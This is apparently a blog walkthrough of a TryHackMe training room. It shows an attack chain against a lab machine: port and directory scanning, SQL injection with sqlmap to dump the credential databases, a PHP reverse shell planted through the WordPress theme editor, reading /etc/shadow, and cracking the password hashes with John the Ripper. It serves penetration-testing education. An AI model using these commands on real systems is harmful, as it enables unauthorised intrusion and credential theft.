UOPEASY - TryHackMe



University of Portsmouth's beginner room. Although it is marked as a beginners rooms but there are many learning here which can be applied in real world.
Note: The IP address mentioned in all the tools below can be different. Kali is used as the attacking machine.

#1 Deploy the machine and connect to our network.
Just Deploy the machine.

#2 Do some basic reconnaissance on the website. What pages can you view? What ports are open? What can you access?
Lets runs some tools like:-
Nmap:
We ran nmap -T4 -A 10.10.128.149
-T<0-5>: Set timing template (higher is faster). Default is 3 we used 4
-A: Enable OS detection, version detection, script scanning, and traceroute
So it found the following open ports running these services:
  • 80/tcp   open  http      Apache httpd 2.4.7 ((Ubuntu))
  • 443/tcp  open  ssl/http   Apache httpd
  • 8080/tcp open  http     Apache httpd
Our target is running a Website. Open it in a web browser and check it out:

There is nothing much on the webpage. Lets check if there are other pages hidden using our next tool - gobuster - to brute force the website.

We ran "gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x .php,.js,.html,.txt -u 10.10.128.149 -t 40"
-w Path to the word-list. We are using a small list here. Same directory have a medium list also which can also be used.
-x File extension(s) to search for. Other extension that can also be used are: .asp,.aspx,.jsp,.do,.action,.json,.yml,.yaml,.xml,.cfg,.bak,.md,.sql,.zip,.tar.gz,.tgz
-u The target URL
-t Number of concurrent threads (default 10) for speed.

#3 You should have found some additional pages on different ports. What service does the site most likely use for this page?
Using above tools we found the following webpages on different ports:
  • http://10.10.178.104/login.php
  • http://10.10.178.104/index.html
  • http://10.10.178.104/phpmyadmin/
  • http://10.10.178.104:8080/wordpress/
  • https://10.10.178.104/wordpress/
Lets run another tool called "whatweb" against all these URL. That should reveal us the technologies which are used on this website:
As you can see this reveals a lot of information which can be used to find vulnerabilities and exploit against these findings.

#4 Using the fact that this site has this service running, how can you exploit it? Do not use SQLMap yet..
This is quite clear that we can try Injection attacks against this website.

#5 Try and return 1 on the page by entering certain characters into the form.
Have a look at this resource and read it through: https://www.sqlinjection.net/login/
Lets use the techniques explained here to attack the login form at:
http://10.10.178.104/login.php, it should be pretty easy to get "1"


#6 Using SQL injection, can you extract the username and password for this form? You may need the help of Burp's intruder function OR SQLMap.
Lets capture the login request from:- http://10.10.178.104/login.php in the BurpSuite Proxy.
Copy the Raw POST request in to file named post.txt and use it with sqlmap
sqlmap -r post.txt -p password
-r Load HTTP request from a file
-p Testable parameter(s)
This clearly indicates that we have time-based blind SQL Injection vulnerability.
We will use the following command to dump the database:
sqlmap -r post.txt -p password --dump
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dbs


Lets dump the tables in wordpress8080 database:
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D wordpress8080
We can dump various parts of the database using commands like:
/* Dump Databases */
sqlmap -u 'http://
10.10.215.191/login.php' --forms --risk=3 --level=5 --dbs

/* Dump Tables under Database “login” */
sqlmap -u 'http://
10.10.215.191/login.php' --forms --risk=3 --level=5 -D login -tables

/* Dump Tables under Database “mysql” */
sqlmap -u 'http://10.10.215.191/login.php' --forms --risk=3 --level=5 -D mysql -tables

/* Dump tables under database “wordpress8080” */
sqlmap -u 'http://
10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D wordpress8080

/* Dump content of the table “users” under database “login” */
sqlmap -u 'http://
10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D login -T users

/* Dump content of the table “user” under database “mysql” */
sqlmap -u 'http://
10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D mysql -T user

/* Dump Schema */
sqlmap -u 'http://
10.10.215.191/login.php' --forms --risk=3 --level=5 --schema --exclude-sysdbs

/* Dump “user”,"Password" columns from table "user" database “mysql" */
sqlmap -u 'http://
10.10.215.191/login.php' --forms --risk=3 --level=5 --dump -D mysql -T user -C user,Password

#7 What was the username?
We will get the username while dumping database in Task 6.

#8 What was the password?
We will get the password while dumping database in Task 6.

#9 Now you have these credentials, where else on the site can you go? Using the credentials you have and another part of the site, login and try to execute remote commands on the server. Use a PHP reverse shell
We saw a link earlier:
  • http://10.10.178.104/phpmyadmin/
Lets login to this using the login phpmyadmin and the password we found:
We are able to login:
Lets try to upload of web-shell using the SQL(search around and you can find lot of examples for that):
Our user 'phpmyadmin' does not have necessary permission. Hmm lets keep looking.
We also saw earlier that we have:
  • http://10.10.178.104:8080/wordpress/
  • https://10.10.178.104/wordpress/
Lets try to login using the credentials admin and the password we found and login to http://10.10.178.104:8080/wordpress/
We are able to login to the WordPress dashboard as admin.Lets try to upload a WordPress plugin which will give us a Reverse Shell.Go to Appearance->Editor->404 template.
Take the php reverse shell code from:
and just change the ip to that of attacking machine and then do Update File:
We should have a netcat listener already on our kali machine and the just go to this link http://10.10.66.28:8080//wordpress/wp-content/themes/twentyfifteen/404.php
to get a reverse shell:

#10 Can you get a reverse shell back to your local machine?
Yes, as shown in the last task.

#11 Can you crack anyone's password? Using the very popular rockyou.txt password list: https://goo.gl/6XcZKJ
From the reverse shell we got we can read /etc/shadow file,here we can see password hashes.These hashes can be cracked using various tools.
The common hashes format are:
  • $1$: MD5-based crypt ('md5crypt')
  • $2$: Blowfish-based crypt ('bcrypt')
  • $sha1$: SHA-1-based crypt ('sha1crypt')
  • $5$: SHA-256-based crypt ('sha256crypt')
  • $6$: SHA-512-based crypt ('sha512crypt')
John the Ripper can be used to crack the password:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt crack.txt
--wordlist The word list
--format  Format as described above. In our case $6$ ==> sha512crypt
crack.txt in the format USERNAME:PASSWORD

#12 What is the final cracked hash password for the user "user"?
The password as cracked in Task 11.

This was some learning. That all for now, see you later :)

Comments

Popular Posts